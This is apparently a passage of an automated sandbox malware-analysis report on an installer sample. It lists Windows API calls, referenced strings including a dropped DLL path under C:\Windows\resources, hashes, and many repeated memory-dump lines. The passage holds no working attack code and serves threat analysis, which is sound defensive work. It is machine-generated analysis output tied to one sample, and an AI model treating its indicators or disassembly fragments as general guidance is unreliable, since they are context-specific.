                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharFileMultiWideWritelstrlen
                                                                  • String ID: 8$C:\Windows\resources\0809\spaciousness\krjning.dll
                                                                  • API String ID: 1453599865-2401819920
                                                                  • Opcode ID: 7e124297e9d9ce9ffc009518b95baa8f09914a5a0a27f2251f5958ee13e5d7fc
                                                                  • Instruction ID: 789ffc1fd5c9b2491a3bc3a33d6618758842135b745afe85e879194269bc7d47
                                                                  • Opcode Fuzzy Hash: 7e124297e9d9ce9ffc009518b95baa8f09914a5a0a27f2251f5958ee13e5d7fc
                                                                  • Instruction Fuzzy Hash: FF018071A40604BFD700ABB19E8DEAF7278EF6031AF20453BF142B60C1D6B84991962E
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404930
                                                                  • GetMessagePos.USER32 ref: 00404938
                                                                  • ScreenToClient.USER32(?,?), ref: 00404952
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404964
                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0040498A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                                  • Instruction ID: e09b5cbf994b9d20e684e2691b51e71dfbdbe619cf93b48063de1b345cd00843
                                                                  • Opcode Fuzzy Hash: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                                  • Instruction Fuzzy Hash: 14015E71940219BADB00DBA4DD85FFFBBBCAF54711F10012BBB50B61C0C7B499018BA4
                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
                                                                  • MulDiv.KERNEL32(0008773C,00000064,00087740), ref: 00402CC6
                                                                  • wsprintfW.USER32 ref: 00402CD6
                                                                  • SetWindowTextW.USER32(?,?), ref: 00402CE6
                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF8
                                                                  Strings
                                                                  • verifying installer: %d%%, xrefs: 00402CD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: verifying installer: %d%%
                                                                  • API String ID: 1451636040-82062127
                                                                  • Opcode ID: b579be9e180f96ba16c56fb513ac100cc9f2c07574638d36e797e7726839ab9f
                                                                  • Instruction ID: 4408f4c8952a47a194ff67b523293e2f30943602a1885e021f1ba6dd9a58fc5a
                                                                  • Opcode Fuzzy Hash: b579be9e180f96ba16c56fb513ac100cc9f2c07574638d36e797e7726839ab9f
                                                                  • Instruction Fuzzy Hash: FB016270640208BFEF20AF64DD49FEE3B69BB00309F008439FA06A92D0DBB89555CF59
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C03
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Close$DeleteEnumOpen
                                                                  • String ID:
                                                                  • API String ID: 1912718029-0
                                                                  • Opcode ID: bd91da1ba0eb139b8caccfea47c3b8adcc0195348a71b7fcd29f2bbb3b0fb127
                                                                  • Instruction ID: 2ec885d680f81863ea04f737883acb0357ac6f266bfb4f4db73bac45c1b80bd2
                                                                  • Opcode Fuzzy Hash: bd91da1ba0eb139b8caccfea47c3b8adcc0195348a71b7fcd29f2bbb3b0fb127
                                                                  • Instruction Fuzzy Hash: AB114671504108FFEF11AF90DE89EAE3B7DEB44348F11007AFA15A10A0D7B59E55AF68
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                  • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                  • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: f92ed742b8a0ee75496ac175dfe81288d6104d94202d046ff176b173357ff204
                                                                  • Instruction ID: a030428118a1c000f424ff4dfb6ba2235896b41d14b08693192eaf3a016f5733
                                                                  • Opcode Fuzzy Hash: f92ed742b8a0ee75496ac175dfe81288d6104d94202d046ff176b173357ff204
                                                                  • Instruction Fuzzy Hash: 92F0ECB2600508AFDB01DBE4EF88CEEB7BCEB08311B15146AF641F6190DA74AD018B38
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401D44
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                  • CreateFontIndirectW.GDI32(0040CD80), ref: 00401DBC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                  • String ID:
                                                                  • API String ID: 3808545654-0
                                                                  • Opcode ID: 3f65254f6df241dee570f3d70183f8ea7dab1824b45f5abdba3aefb20010bb6e
                                                                  • Instruction ID: 116310afc90cc01f82b49c11926c77c683d1a1b46be819c55f1a02a8d5d7abe2
                                                                  • Opcode Fuzzy Hash: 3f65254f6df241dee570f3d70183f8ea7dab1824b45f5abdba3aefb20010bb6e
                                                                  • Instruction Fuzzy Hash: DC016D35944640EFEB016BB0AF8AB9A3F74EF55305F104A79F545B62E2CA7804098B2D
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(0042D1F8,0042D1F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 004048C0
                                                                  • wsprintfW.USER32 ref: 004048C9
                                                                  • SetDlgItemTextW.USER32(?,0042D1F8), ref: 004048DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s
                                                                  • API String ID: 3540041739-3551169577
                                                                  • Opcode ID: 5da30bc4b92d9d0c1cfe05e529173974ba3df4af4940e0a2dfa50fc19328e1e1
                                                                  • Instruction ID: 531d837b88f4b702d8d9e34e744ab90cc2584a20199bf08e47c16144e152f227
                                                                  • Opcode Fuzzy Hash: 5da30bc4b92d9d0c1cfe05e529173974ba3df4af4940e0a2dfa50fc19328e1e1
                                                                  • Instruction Fuzzy Hash: CB11E6736002243BDB10A66D9C4AEDF3659DBC2334F14863BFA25F61D1D978891186E8
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: fa0622c80f3ea4c4a1a4fe4c6f91de5de270cf664640931bdd5eb32ff74c1ad7
                                                                  • Instruction ID: d25c1399015d6fc3d8f93c2dcf78642a10d85d9054307dbf3bdfe5c686c79543
                                                                  • Opcode Fuzzy Hash: fa0622c80f3ea4c4a1a4fe4c6f91de5de270cf664640931bdd5eb32ff74c1ad7
                                                                  • Instruction Fuzzy Hash: FC21B371A44208AFEF01AFB0CA4AEAD7B75EF45308F10413EF502B61D1D7B8A941DB18
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,00405EE1,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C98
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00405EE1,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405CB9
                                                                  • RegCloseKey.ADVAPI32(?,?,00405EE1,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405CDC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: : Completed
                                                                  • API String ID: 3677997916-2954849223
                                                                  • Opcode ID: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                                  • Instruction ID: 1d06ac5ea4b77b92fe9c69a11a88cf34e34d0d3ad3680f8f47b16bffbdb95091
                                                                  • Opcode Fuzzy Hash: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                                  • Instruction Fuzzy Hash: AE01483115060AAADB218F16ED08E9B3BA8FF44350F01402AF945D2260D734D964DFA9
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403213,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756F3420,004033E1), ref: 004057F2
                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403213,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756F3420,004033E1), ref: 004057FC
                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 0040580E
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004057EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-1881609536
                                                                  • Opcode ID: de9dddfcd7a9d618380513bff0a4e880c88fc064ccebdc1c89e46d65784464cc
                                                                  • Instruction ID: f63ca075a24b3552cb7c5632698c0476d366f5162805e4a7ef835507e0185024
                                                                  • Opcode Fuzzy Hash: de9dddfcd7a9d618380513bff0a4e880c88fc064ccebdc1c89e46d65784464cc
                                                                  • Instruction Fuzzy Hash: 9DD05E21102E20AAD1117B849C08EDB629DEE85300340847BF500B21A1CB7819518BED
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000,00402EE3,00000001,?,?,?,00000000,0040344F,?), ref: 00402D16
                                                                  • GetTickCount.KERNEL32 ref: 00402D34
                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402D51
                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,0040344F,?), ref: 00402D5F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                  • String ID:
                                                                  • API String ID: 2102729457-0
                                                                  • Opcode ID: aed48f930e6cb8163906278dd1a6a8d55546e7dcfd90fdb5b9c2cdca09a853f5
                                                                  • Instruction ID: 0f67fd822d339501c317f9c9290c0d88a12acd91c10ffcc8c100a5c20b21d8f0
                                                                  • Opcode Fuzzy Hash: aed48f930e6cb8163906278dd1a6a8d55546e7dcfd90fdb5b9c2cdca09a853f5
                                                                  • Instruction Fuzzy Hash: 8EF0F870603620BFC621AB64FF4DA9B7A65FB44B12B95047AF141B11E4D7B848C1CBDD
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 00404FEE
                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 0040503F
                                                                    • Part of subcall function 00404032: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404044
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                                  • Instruction ID: bbda00c2ce61db54858d54f75231ff4833bc9f24808a58ee1059b1aa4c9daed2
                                                                  • Opcode Fuzzy Hash: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                                  • Instruction Fuzzy Hash: 44018F71100608AFDF318F11DD81AAF3A2AEB88354F104037FA00761D1CB7A8DA2DEA9
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,756F3420,004036AE,004034F0,?), ref: 004036F0
                                                                  • GlobalFree.KERNEL32(?), ref: 004036F7
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004036E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
